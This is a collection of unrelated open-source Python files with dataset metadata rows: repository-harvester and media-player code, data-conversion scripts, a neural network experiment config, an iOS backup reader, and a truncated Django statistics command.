class Iwu_commonsHarvester(OAIHarvester):
short_name = 'iwu_commons'
long_name = 'Digital Commons @ Illinois Wesleyan University'
url = 'http://digitalcommons.iwu.edu'
base_url = 'http://digitalcommons.iwu.edu/do/oai/'
property_list = ['date', 'type', 'source', 'format', 'identifier', 'setSpec']
approved_sets = [
u'oral_hist',
u'ames_award',
u'arthonors_book_gallery',
u'arthonors',
u'bio',
u'music_compositions',
u'cs',
u'constructing',
u'economics',
u'education',
u'ed_studies_posters',
u'eng',
u'envstu',
u'fac_biennial_exhibit_all',
u'fac_biennial_exhibit2011',
u'fac_biennial_exhibit2013',
u'fac_biennial_exhibit',
u'firstyear_summer',
u'founders_day_docs',
u'german',
u'theatre_hist',
u'history',
u'teaching_excellence',
u'honors_docs',
u'honors_programs_docs',
u'physics_honproj',
u'bio_honproj',
u'intstu_honproj',
u'envstu_honproj',
u'russian_honproj',
u'history_honproj',
u'theatre_honproj',
u'religion_honproj',
u'wostu_honproj',
u'nursing_honproj',
u'education_honproj',
u'eng_honproj',
u'french_honproj',
u'math_honproj',
u'socanth_honproj',
u'econ_honproj',
u'art_honproj',
u'cs_honproj',
u'amstudies_honproj',
u'grs_honproj',
u'hispstu_honproj',
u'polisci_honproj',
u'chem_honproj',
u'phil_honproj',
u'acct_fin_honproj',
u'busadmin_honproj',
u'german_honproj',
u'psych_honproj',
u'bookshelf',
u'wglt_interviews',
u'oralhist_2009',
u'oralhist_ucd',
u'oralhist_wesn',
u'italian',
u'japanese',
u'jwprc',
u'math',
u'music',
u'nursing',
u'oralhistory',
u'oralhistory_gallery',
u'anth_ethno',
u'gateway',
u'envstu_seminar',
u'music_outstanding_works',
u'writing_student',
u'polsci',
u'psych',
u'religion',
u'respublica',
u'russian',
u'grs_scholarship',
u'math_scholarship',
u'nursing_scholarship',
u'bio_scholarship',
u'religion_scholarship',
u'mcll_scholarship',
u'envstu_scholarship',
u'physics_scholarship',
u'socanth_scholarship',
u'history_scholarship',
u'intstu_scholarship',
u'cs_scholarship',
u'chem_scholarship',
u'eng_scholarship',
u'hispstu_scholarship',
u'psych_scholarship',
u'socanth',
u'student_prof',
u'sea',
u'parkplace',
u'uer',
u'germanresearch',
u'uauje',
u'univcom',
u'wglt'
]
timezone_granularity = True
| apache-2.0 | 4,698,636,792,873,201,000 | 25.227642 | 94 | 0.542157 | false | 2.908927 | false | false | false |
Gaaralmn/resume | scripts/fs_sty.py | 10 | 1702 | #!/usr/bin/env python
import os
import re
from sys import argv
scripts, css = argv
# filter icon name, ignore alias
def fil_icname(line):
if re.search('^\.fa-.*:before {$', line):
ic_name = re.split("[.:]", line)[1][3:]
return ic_name
def fil_iccode(line):
if re.search('^ content: .*;$', line):
ic_code = re.split("[\"]", line)[1][1:].upper()
return ic_code
# turn icon name to Camel Case
# forked from https://github.com/schischi-a/fontawesome-latex
def camel_case(name):
ret = name.replace('-', ' ')
ret = ret.title()
ret = ret.replace(' ', '')
return ret
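# e.g. camel_case("angle-double-left") -> "AngleDoubleLeft"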
def get_icons(fs_css):
icons = []
with open(fs_css, 'r') as fs_fp:
for line in fs_fp:
icon_name = fil_icname(line)
if icon_name is not None:
line = next(fs_fp)
icon_code = fil_iccode(line)
if icon_code is not None:
tex_name = camel_case(icon_name)
icons.append((icon_name, icon_code, tex_name))
return icons
def output_sty(sty, icons):
with open(sty, 'a') as f:
for ic in icons:
prefix = "\expandafter\def\csname faicon@"
ic_name_h = prefix + ic[0] + "\endcsname"
ic_code_tex = "{\symbol{\"" + ic[1] + "}} \\def\\fa" + ic[2]
ic_name_tail = " {{\FA\csname faicon@" + ic[0] + "\endcsname}}\n"
f.write(ic_name_h.ljust(63) + ic_code_tex.ljust(42) + ic_name_tail)
if __name__ == "__main__":
print("output fontawesome.sty...")
icons = get_icons(css)
temp_dir = os.path.dirname(css)
sty = os.path.join(temp_dir, "fontawesome.sty")
output_sty(sty, icons)
| mit | 5,049,159,092,591,307,000 | 26.901639 | 79 | 0.538778 | false | 2.934483 | false | false | false |
mmottahedi/neuralnilm_prototype | scripts/e544.py | 2 | 6184 | from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource)
from neuralnilm.source import (standardise, discretize, fdiff, power_and_fdiff,
RandomSegments, RandomSegmentsInMemory,
SameLocation)
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import (MixtureDensityLayer, DeConv1DLayer,
SharedWeightsDenseLayer)
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter, CentralOutputPlotter, Plotter, RectangularOutputPlotter, StartEndMeanPlotter
from neuralnilm.updates import clipped_nesterov_momentum
from neuralnilm.disaggregate import disaggregate
from neuralnilm.rectangulariser import rectangularise
from lasagne.nonlinearities import sigmoid, rectify, tanh, identity, softmax
from lasagne.objectives import squared_error, binary_crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import (DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer,
DimshuffleLayer, DropoutLayer, ConcatLayer, PadLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
import gc
"""
447: first attempt at disaggregation
"""
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
#PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
PATH = "/data/dk3810/figures"
SAVE_PLOT_INTERVAL = 25000
N_SEQ_PER_BATCH = 64
MAX_TARGET_POWER = 300
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
['washer dryer', 'washing machine'],
'kettle',
'HTPC',
'dish washer'
],
max_appliance_powers=[MAX_TARGET_POWER, 2400, 2400, 200, 2500],
on_power_thresholds=[5] * 5,
min_on_durations=[60, 1800, 30, 60, 1800],
min_off_durations=[12, 600, 1, 12, 1800],
# date finished installing meters in house 1 = 2013-04-12
window=("2013-04-12", "2014-12-10"),
seq_length=512,
output_one_appliance=True,
train_buildings=[1],
validation_buildings=[1],
n_seq_per_batch=N_SEQ_PER_BATCH,
standardise_input=True,
independently_center_inputs=False,
skip_probability=0.75,
# skip_probability_for_first_appliance=0.5,
target_is_start_and_end_and_mean=True,
one_target_per_seq=False
)
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
loss_function=lambda x, t: squared_error(x, t).mean(),
updates_func=nesterov_momentum,
learning_rate=1e-3,
learning_rate_changes_by_iteration={
500000: 1e-4,
600000: 1e-5
},
do_save_activations=True,
auto_reshape=False,
plotter=StartEndMeanPlotter(
n_seq_to_plot=32, max_target_power=MAX_TARGET_POWER)
)
def exp_a(name):
global source
source_dict_copy = deepcopy(source_dict)
source_dict_copy.update(dict(
logger=logging.getLogger(name)
))
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
NUM_FILTERS = 16
target_seq_length = source.output_shape_after_processing()[1]
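    # Layer sketch: two length-4 1-D convolutions over time, followed by a
    # stack of dense layers narrowing to the (start, end, mean) targets.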
net_dict_copy['layers_config'] = [
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # (batch, features, time)
},
{
'type': PadLayer,
'width': 4
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_size': 4,
'stride': 1,
'nonlinearity': None,
'border_mode': 'valid'
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_size': 4,
'stride': 1,
'nonlinearity': None,
'border_mode': 'valid'
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1), # back to (batch, time, features)
'label': 'dimshuffle3'
},
{
'type': DenseLayer,
'num_units': 512 * 8,
'nonlinearity': rectify,
'label': 'dense0'
},
{
'type': DenseLayer,
'num_units': 512 * 6,
'nonlinearity': rectify,
'label': 'dense1'
},
{
'type': DenseLayer,
'num_units': 512 * 4,
'nonlinearity': rectify,
'label': 'dense2'
},
{
'type': DenseLayer,
'num_units': 512,
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': target_seq_length,
'nonlinearity': None
}
]
net = Net(**net_dict_copy)
return net
def main():
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
# raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
"""
Emacs variables
Local Variables:
compile-command: "cp /home/jack/workspace/python/neuralnilm/scripts/e544.py /mnt/sshfs/imperial/workspace/python/neuralnilm/scripts/"
End:
"""
| mit | 7,918,684,810,106,850,000 | 29.613861 | 133 | 0.599612 | false | 3.626979 | false | false | false |
pombredanne/SourceForge-Allura | ForgeWiki/forgewiki/command/wiki2markdown/loaders.py | 2 | 7674 | import os
import json
import datetime
from pylons import c
from ming.orm.ormsession import ThreadLocalORMSession
from allura import model as M
from forgewiki import model as WM
from forgewiki.converters import mediawiki2markdown
from forgewiki.converters import mediawiki_internal_links2markdown
from allura.command import base as allura_base
from allura.lib import helpers as h
from allura.lib import utils
from allura.model.session import artifact_orm_session
class MediawikiLoader(object):
"""Load MediaWiki data from json to Allura wiki tool"""
TIMESTAMP_FMT = '%Y%m%d%H%M%S'
def __init__(self, options):
self.options = options
self.nbhd = M.Neighborhood.query.get(name=options.nbhd)
if not self.nbhd:
allura_base.log.error("Can't find neighborhood with name %s"
% options.nbhd)
exit(2)
self.project = M.Project.query.get(shortname=options.project,
neighborhood_id=self.nbhd._id)
if not self.project:
allura_base.log.error("Can't find project with shortname %s "
"and neighborhood_id %s"
% (options.project, self.nbhd._id))
exit(2)
self.wiki = self.project.app_instance('wiki')
if not self.wiki:
allura_base.log.error("Can't find wiki app in given project")
exit(2)
h.set_context(self.project.shortname, 'wiki', neighborhood=self.nbhd)
self.project.notifications_disabled = True
def exit(self, status):
self.project.notifications_disabled = False
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
exit(status)
def load(self):
artifact_orm_session._get().skip_mod_date = True
self.load_pages()
self.project.notifications_disabled = False
artifact_orm_session._get().skip_mod_date = False
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
allura_base.log.info('Loading wiki done')
def _pages(self):
"""Yield path to page dump directory for next wiki page"""
pages_dir = os.path.join(self.options.dump_dir, 'pages')
pages = []
if not os.path.isdir(pages_dir):
return
pages = os.listdir(pages_dir)
for directory in pages:
dir_path = os.path.join(pages_dir, directory)
if os.path.isdir(dir_path):
yield dir_path
def _history(self, page_dir):
"""Yield page_data for next wiki page in edit history"""
page_dir = os.path.join(page_dir, 'history')
if not os.path.isdir(page_dir):
return
pages = os.listdir(page_dir)
        pages.sort()  # ensure that history is in the right order
for page in pages:
fn = os.path.join(page_dir, page)
try:
with open(fn, 'r') as pages_file:
page_data = json.load(pages_file)
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
except ValueError, e:
allura_base.log.error("Can't load data from file %s: %s"
% (fn, str(e)))
self.exit(2)
yield page_data
def _talk(self, page_dir):
"""Return talk data from json dump"""
filename = os.path.join(page_dir, 'discussion.json')
if not os.path.isfile(filename):
return
try:
with open(filename, 'r') as talk_file:
talk_data = json.load(talk_file)
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
except ValueError, e:
allura_base.log.error("Can't load data from file %s: %s"
% (filename, str(e)))
self.exit(2)
return talk_data
def _attachments(self, page_dir):
"""Yield (filename, full path) to next attachment for given page."""
attachments_dir = os.path.join(page_dir, 'attachments')
if not os.path.isdir(attachments_dir):
return
attachments = os.listdir(attachments_dir)
for filename in attachments:
yield filename, os.path.join(attachments_dir, filename)
def load_pages(self):
"""Load pages with edit history from json to Allura wiki tool"""
allura_base.log.info('Loading pages into allura...')
for page_dir in self._pages():
for page in self._history(page_dir):
p = WM.Page.upsert(page['title'])
p.viewable_by = ['all']
p.text = mediawiki_internal_links2markdown(
mediawiki2markdown(page['text']),
page['title'])
timestamp = datetime.datetime.strptime(page['timestamp'],
self.TIMESTAMP_FMT)
p.mod_date = timestamp
c.user = (M.User.query.get(username=page['username'].lower())
or M.User.anonymous())
ss = p.commit()
ss.mod_date = ss.timestamp = timestamp
# set home to main page
if page['title'] == 'Main_Page':
gl = WM.Globals.query.get(app_config_id=self.wiki.config._id)
if gl is not None:
gl.root = page['title']
allura_base.log.info('Loaded history of page %s (%s)'
% (page['page_id'], page['title']))
self.load_talk(page_dir, page['title'])
self.load_attachments(page_dir, page['title'])
def load_talk(self, page_dir, page_title):
"""Load talk for page.
page_dir - path to directory with page dump.
page_title - page title in Allura Wiki
"""
talk_data = self._talk(page_dir)
if not talk_data:
return
text = mediawiki2markdown(talk_data['text'])
page = WM.Page.query.get(app_config_id=self.wiki.config._id,
title=page_title)
if not page:
return
thread = M.Thread.query.get(ref_id=page.index_id())
if not thread:
return
timestamp = datetime.datetime.strptime(talk_data['timestamp'],
self.TIMESTAMP_FMT)
c.user = (M.User.query.get(username=talk_data['username'].lower())
or M.User.anonymous())
thread.add_post(
text=text,
discussion_id=thread.discussion_id,
thread_id=thread._id,
timestamp=timestamp,
ignore_security=True)
allura_base.log.info('Loaded talk for page %s' % page_title)
def load_attachments(self, page_dir, page_title):
"""Load attachments for page.
page_dir - path to directory with page dump.
"""
page = WM.Page.query.get(app_config_id=self.wiki.config._id,
title=page_title)
for filename, path in self._attachments(page_dir):
try:
with open(path) as fp:
page.attach(filename, fp,
content_type=utils.guess_mime_type(filename))
except IOError, e:
allura_base.log.error("Can't open file: %s" % str(e))
self.exit(2)
allura_base.log.info('Loaded attachments for page %s.' % page_title)
| apache-2.0 | -5,020,394,957,929,959,000 | 39.17801 | 77 | 0.548345 | false | 4.03258 | true | false | false |
gstiebler/odemis | src/odemis/dataio/png.py | 2 | 3415 | # -*- coding: utf-8 -*-
'''
Created on 2 Sep 2014
@author: Éric Piel
Copyright © 2014 Éric Piel, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not, see http://www.gnu.org/licenses/.
'''
# Very rough converter to simple 8-bit PNG
from __future__ import division
import logging
from odemis import model
from odemis.util import img
import os
import scipy
FORMAT = "PNG"
# list of file-name extensions possible, the first one is the default when saving a file
EXTENSIONS = [u".png"]
# TODO: support 16-bits? But then it looses the point to have a "simple" format?
LOSSY = True # because it doesn't support 16 bits
def _saveAsPNG(filename, data):
# TODO: store metadata
# TODO: support RGB
if data.metadata.get(model.MD_DIMS) == 'YXC':
rgb8 = data
else:
data = img.ensure2DImage(data)
# TODO: it currently fails with large data, use gdal instead?
# tempdriver = gdal.GetDriverByName('MEM')
# tmp = tempdriver.Create('', rgb8.shape[1], rgb8.shape[0], 1, gdal.GDT_Byte)
# tiledriver = gdal.GetDriverByName("png")
# tmp.GetRasterBand(1).WriteArray(rgb8[:, :, 0])
# tiledriver.CreateCopy("testgdal.png", tmp, strict=0)
# TODO: support greyscale png?
# TODO: skip if already 8 bits
# Convert to 8 bit RGB
hist, edges = img.histogram(data)
irange = img.findOptimalRange(hist, edges, 1 / 256)
rgb8 = img.DataArray2RGB(data, irange)
# save to file
scipy.misc.imsave(filename, rgb8)
def export(filename, data, thumbnail=None):
'''
Write a PNG file with the given image
    filename (unicode): filename of the file to create (including path). If more
      than one DataArray is passed, a number is appended to each filename.
data (list of model.DataArray, or model.DataArray): the data to export.
Metadata is taken directly from the DA object. If it's a list, a multiple
page file is created. It must have 5 dimensions in this order: Channel,
Time, Z, Y, X. However, all the first dimensions of size 1 can be omitted
(ex: an array of 111YX can be given just as YX, but RGB images are 311YX,
so must always be 5 dimensions).
thumbnail (None or numpy.array): Image used as thumbnail for the file. Can be of any
(reasonable) size. Must be either 2D array (greyscale) or 3D with last
dimension of length 3 (RGB). As png doesn't support it, it will
be dropped silently.
'''
if thumbnail is not None:
logging.info("Dropping thumbnail, not supported in PNG")
if isinstance(data, list):
if len(data) > 1:
# Name the files aaa-XXX.png
base, ext = os.path.splitext(filename)
for i, d in enumerate(data):
fn = "%s-%03d%s" % (base, i, ext)
_saveAsPNG(fn, d)
else:
_saveAsPNG(filename, data[0])
else:
_saveAsPNG(filename, data)
| gpl-2.0 | 6,314,940,524,442,912,000 | 36.911111 | 226 | 0.666471 | false | 3.708696 | false | false | false |
Danielhiversen/home-assistant | homeassistant/components/media_player/songpal.py | 3 | 7690 | """
Support for Songpal-enabled (Sony) media devices.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.songpal/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
DOMAIN, PLATFORM_SCHEMA, SUPPORT_SELECT_SOURCE, SUPPORT_TURN_OFF,
SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,
SUPPORT_VOLUME_STEP, MediaPlayerDevice)
from homeassistant.const import ATTR_ENTITY_ID, CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['python-songpal==0.0.8']
_LOGGER = logging.getLogger(__name__)
CONF_ENDPOINT = 'endpoint'
PARAM_NAME = 'name'
PARAM_VALUE = 'value'
PLATFORM = 'songpal'
SET_SOUND_SETTING = 'songpal_set_sound_setting'
SUPPORT_SONGPAL = SUPPORT_VOLUME_SET | SUPPORT_VOLUME_STEP | \
SUPPORT_VOLUME_MUTE | SUPPORT_SELECT_SOURCE | \
SUPPORT_TURN_ON | SUPPORT_TURN_OFF
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME): cv.string,
vol.Required(CONF_ENDPOINT): cv.string,
})
SET_SOUND_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(PARAM_NAME): cv.string,
vol.Required(PARAM_VALUE): cv.string,
})
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the Songpal platform."""
from songpal import SongpalException
if PLATFORM not in hass.data:
hass.data[PLATFORM] = {}
if discovery_info is not None:
name = discovery_info["name"]
endpoint = discovery_info["properties"]["endpoint"]
_LOGGER.debug("Got autodiscovered %s - endpoint: %s", name, endpoint)
device = SongpalDevice(name, endpoint)
else:
name = config.get(CONF_NAME)
endpoint = config.get(CONF_ENDPOINT)
device = SongpalDevice(name, endpoint)
try:
await device.initialize()
except SongpalException as ex:
_LOGGER.error("Unable to get methods from songpal: %s", ex)
raise PlatformNotReady
hass.data[PLATFORM][endpoint] = device
async_add_entities([device], True)
async def async_service_handler(service):
"""Service handler."""
entity_id = service.data.get("entity_id", None)
params = {key: value for key, value in service.data.items()
if key != ATTR_ENTITY_ID}
for device in hass.data[PLATFORM].values():
if device.entity_id == entity_id or entity_id is None:
_LOGGER.debug("Calling %s (entity: %s) with params %s",
service, entity_id, params)
await device.async_set_sound_setting(
params[PARAM_NAME], params[PARAM_VALUE])
hass.services.async_register(
DOMAIN, SET_SOUND_SETTING, async_service_handler,
schema=SET_SOUND_SCHEMA)
class SongpalDevice(MediaPlayerDevice):
"""Class representing a Songpal device."""
def __init__(self, name, endpoint):
"""Init."""
import songpal
self._name = name
self.endpoint = endpoint
self.dev = songpal.Device(self.endpoint)
self._sysinfo = None
self._state = False
self._available = False
self._initialized = False
self._volume_control = None
self._volume_min = 0
self._volume_max = 1
self._volume = 0
self._is_muted = False
self._sources = []
async def initialize(self):
"""Initialize the device."""
await self.dev.get_supported_methods()
self._sysinfo = await self.dev.get_system_info()
@property
def name(self):
"""Return name of the device."""
return self._name
@property
def unique_id(self):
"""Return a unique ID."""
return self._sysinfo.macAddr
@property
def available(self):
"""Return availability of the device."""
return self._available
async def async_set_sound_setting(self, name, value):
"""Change a setting on the device."""
await self.dev.set_sound_settings(name, value)
async def async_update(self):
"""Fetch updates from the device."""
from songpal import SongpalException
try:
volumes = await self.dev.get_volume_information()
if not volumes:
_LOGGER.error("Got no volume controls, bailing out")
self._available = False
return
if len(volumes) > 1:
_LOGGER.debug(
"Got %s volume controls, using the first one", volumes)
volume = volumes[0]
_LOGGER.debug("Current volume: %s", volume)
self._volume_max = volume.maxVolume
self._volume_min = volume.minVolume
self._volume = volume.volume
self._volume_control = volume
self._is_muted = self._volume_control.is_muted
status = await self.dev.get_power()
self._state = status.status
_LOGGER.debug("Got state: %s", status)
inputs = await self.dev.get_inputs()
_LOGGER.debug("Got ins: %s", inputs)
self._sources = inputs
self._available = True
except SongpalException as ex:
# if we were available, print out the exception
if self._available:
_LOGGER.error("Got an exception: %s", ex)
self._available = False
async def async_select_source(self, source):
"""Select source."""
for out in self._sources:
if out.title == source:
await out.activate()
return
_LOGGER.error("Unable to find output: %s", source)
@property
def source_list(self):
"""Return list of available sources."""
return [x.title for x in self._sources]
@property
def state(self):
"""Return current state."""
if self._state:
return STATE_ON
return STATE_OFF
@property
def source(self):
"""Return currently active source."""
for out in self._sources:
if out.active:
return out.title
return None
@property
def volume_level(self):
"""Return volume level."""
volume = self._volume / self._volume_max
return volume
async def async_set_volume_level(self, volume):
"""Set volume level."""
volume = int(volume * self._volume_max)
_LOGGER.debug("Setting volume to %s", volume)
return await self._volume_control.set_volume(volume)
async def async_volume_up(self):
"""Set volume up."""
return await self._volume_control.set_volume("+1")
async def async_volume_down(self):
"""Set volume down."""
return await self._volume_control.set_volume("-1")
async def async_turn_on(self):
"""Turn the device on."""
return await self.dev.set_power(True)
async def async_turn_off(self):
"""Turn the device off."""
return await self.dev.set_power(False)
async def async_mute_volume(self, mute):
"""Mute or unmute the device."""
_LOGGER.debug("Set mute: %s", mute)
return await self._volume_control.set_mute(mute)
@property
def is_volume_muted(self):
"""Return whether the device is muted."""
return self._is_muted
@property
def supported_features(self):
"""Return supported features."""
return SUPPORT_SONGPAL
| mit | 4,327,482,265,439,586,000 | 29.515873 | 78 | 0.602731 | false | 4.088251 | false | false | false |
yiwen-luo/LeetCode | Python/next-closest-time.py | 3 | 1267 | # Time: O(1)
# Space: O(1)
# Given a time represented in the format "HH:MM",
# form the next closest time by reusing the current digits.
# There is no limit on how many times a digit can be reused.
#
# You may assume the given input string is always valid.
# For example, "01:34", "12:09" are all valid. "1:34", "12:9" are all invalid.
#
# Example 1:
#
# Input: "19:34"
# Output: "19:39"
# Explanation: The next closest time choosing from digits 1, 9, 3, 4, is 19:39, which occurs 5 minutes later.
# It is not 19:33, because this occurs 23 hours and 59 minutes later.
#
# Example 2:
#
# Input: "23:59"
# Output: "22:22"
# Explanation: The next closest time choosing from digits 2, 3, 5, 9, is 22:22.
# It may be assumed that the returned time is next day's time since it is smaller than the input time numerically.
class Solution(object):
def nextClosestTime(self, time):
"""
:type time: str
:rtype: str
"""
h, m = time.split(":")
curr = int(h) * 60 + int(m)
result = None
for i in xrange(curr+1, curr+1441):
t = i % 1440
h, m = t // 60, t % 60
result = "%02d:%02d" % (h, m)
if set(result) <= set(time):
break
return result
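# Hypothetical quick check of the solution above:
# print(Solution().nextClosestTime("19:34"))  # expected "19:39"
# print(Solution().nextClosestTime("23:59"))  # expected "22:22"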
| mit | -679,157,756,229,711,200 | 30.675 | 114 | 0.595107 | false | 3.223919 | false | false | false |
fmartingr/iosfu | iosfu/backup.py | 1 | 5063 | from __future__ import with_statement
from os import listdir
from os.path import join as join_paths, basename, isdir, isfile
from plistlib import readPlist
from biplist import readPlist as readBinaryPlist
from .conf import BACKUPS_PATH, BACKUP_DEFAULT_SETTINGS
from iosfu import utils
class BackupManager(object):
# Path to backups
path = None
# Backups loaded
backups = {}
def __init__(self, path=BACKUPS_PATH):
self.path = path
def lookup(self):
"""
Look for backup folders on PATH
"""
folders = listdir(self.path)
for dirname in folders:
path = join_paths(self.path, dirname)
if isdir(path):
backup = Backup(path)
self.backups[backup.id] = backup
def get(self, backup_id):
if backup_id in self.backups and self.backups[backup_id].valid:
return self.backups[backup_id]
else:
raise Exception('Backup not registered')
class Backup(object):
"""
Backup object
"""
# Backup id
id = None
# Backup path
path = None
# Files
files = []
    # bool indicating whether it's valid -> self.init_check()
valid = True
# Required files to mark as valid
_required_files = [
'Info.plist', 'Manifest.mbdb', 'Manifest.plist', 'Status.plist'
]
# File handlers to call methods
_file_handlers = {
'.plist': '_read_plist'
}
_plist = {}
# Data
_data_file = None
_data = {}
    def __init__(self, path):
        self.path = path
        # per-instance containers; the class-level defaults above are shared
        # between all instances and would otherwise accumulate stale state
        self.files = []
        self._plist = {}
        self._data = {}
        self.get_info()
        self._data_file = self.get_data_file()
        self.init_check()
        self.read_data_file()
@property
def name(self):
name = self.data('name') or self.id
return name
def get_data_file(self):
return "{}.iosfu".format(self.path)
def read_data_file(self):
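        """Read the backup's .iosfu data file into self._data, creating it
        with BACKUP_DEFAULT_SETTINGS on first access."""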
try:
handler = open(self._data_file)
except (OSError, IOError):
# Create default config file if non-existant
handler = open(self._data_file, 'w+')
handler.write(utils.serialize(BACKUP_DEFAULT_SETTINGS))
handler.seek(0)
finally:
with handler as f:
data_file = f.read()
self._data = utils.deserialize(data_file)
handler.close()
def get_info(self):
"""
Get all the basic info for the backup
"""
self.id = basename(self.path)
# Check all files
for filename in listdir(self.path):
if isfile(join_paths(self.path, filename)):
self.files.append(filename)
# Check handlers
for match in self._file_handlers.keys():
if match in filename:
handler = getattr(self, self._file_handlers[match])
handler(filename)
def init_check(self):
"""
Check if the needed stuff are there to consider this a backup
"""
for required_file in self._required_files:
# Check if required files are there
# FIXME Sometimes it doesn't work :?
if required_file not in self.files:
self.valid = False
def exists(self, filename):
"""
Check if the given file exists
"""
return filename in self.files
def get_file(self, filename, handler=False):
"""
Returns given file path
- handler (bool) - Returns handler instead of path
"""
result = None
if self.exists(filename):
file_path = join_paths(self.path, filename)
if handler:
result = open(file_path, 'rb')
else:
result = file_path
return result
#
# File handlers
#
def _read_plist(self, filename):
"""
Handler for .plist files
Reads them and stores on self._plist for plugin access
"""
file_path = self.get_file(filename)
try:
self._plist[filename] = readPlist(file_path)
except:
# Is binaryPlist?
try:
self._plist[filename] = readBinaryPlist(file_path)
except:
# What is it?
pass
#
# Backup data file
#
def data(self, key, value=None):
result = value
if value:
self._data[key] = value
elif key in self._data:
result = self._data[key]
return result
def cache(self, key, value=None):
result = value
if value:
self._data['cache'][key] = value
elif key in self._data['cache']:
result = self._data['cache'][key]
return result
def clear_cache(self):
self._data['cache'] = {}
self.write_data_file()
def write_data_file(self):
handler = open(self._data_file, 'w+')
handler.write(utils.serialize(self._data))
handler.close()
| mit | 8,790,374,785,862,651,000 | 24.700508 | 75 | 0.537428 | false | 4.22621 | false | false | false |
consbio/seedsource-core | seedsource_core/django/seedsource/management/commands/export_seedzone_stats.py | 1 | 11651 | import errno
import json
import math
import os
import time
from collections import defaultdict
from csv import DictWriter
import warnings
import numpy
from progress.bar import Bar
from django.conf import settings
from django.core.management import BaseCommand, CommandError
from django.contrib.gis.db.models.functions import Area
from rasterio.features import rasterize
from seedsource_core.django.seedsource.models import SeedZone, Region, ZoneSource
from ..constants import PERIODS, VARIABLES
from ..utils import get_regions_for_zone, calculate_pixel_area, generate_missing_bands
from ..dataset import (
ElevationDataset,
ClimateDatasets,
)
from ..statswriter import StatsWriters
from ..zoneconfig import ZoneConfig
class Command(BaseCommand):
help = "Export seed zone statistics and sample data"
def add_arguments(self, parser):
parser.add_argument("output_directory", nargs=1, type=str)
parser.add_argument(
"--zones",
dest="zoneset",
default=None,
help="Comma delimited list of zones sets to analyze. (default is to analyze all available zone sets)",
)
parser.add_argument(
"--variables",
dest="variables",
default=None,
help="Comma delimited list of variables analyze. (default is to analyze all available variables: {})".format(
",".join(VARIABLES)
),
)
parser.add_argument(
"--periods",
dest="periods",
default=None,
help="Comma delimited list of time periods analyze. (default is to analyze all available time periods: {})".format(
",".join(PERIODS)
),
)
parser.add_argument(
"--seed",
dest="seed",
default=None,
help="Seed for random number generator, to reproduce previous random samples",
type=int,
)
def _write_sample(self, output_directory, variable, id, zone_id, data, low, high):
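        """Write a random sample of up to 1000 values from `data` for one
        variable and elevation band to <id>_<low>_<high>.txt."""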
sample = data.copy()
numpy.random.shuffle(sample)
sample = sample[:1000]
filename = "{}_{}_{}.txt".format(id, low, high)
with open(os.path.join(output_directory, "{}_samples".format(variable), filename), "w") as f:
f.write(",".join(str(x) for x in sample))
f.write(os.linesep)
def handle(self, output_directory, zoneset, variables, periods, seed, *args, **kwargs):
output_directory = output_directory[0]
if zoneset is None or zoneset.strip() == "":
sources = ZoneSource.objects.all().order_by("name")
if len(sources) == 0:
raise CommandError("No zonesets available to analyze")
else:
sources = ZoneSource.objects.filter(name__in=zoneset.split(",")).order_by("name")
if len(sources) == 0:
raise CommandError("No zonesets available to analyze that match --zones values")
if variables is None:
variables = VARIABLES
else:
variables = set(variables.split(","))
missing = variables.difference(VARIABLES)
if missing:
raise CommandError("These variables are not available: {}".format(",".join(missing)))
if periods is None:
periods = PERIODS
else:
periods = set(periods.split(","))
missing = periods.difference(PERIODS)
if missing:
raise CommandError("These periods are not available: {}".format(",".join(missing)))
### Initialize random seed
if seed is None:
seed = int(time.time())
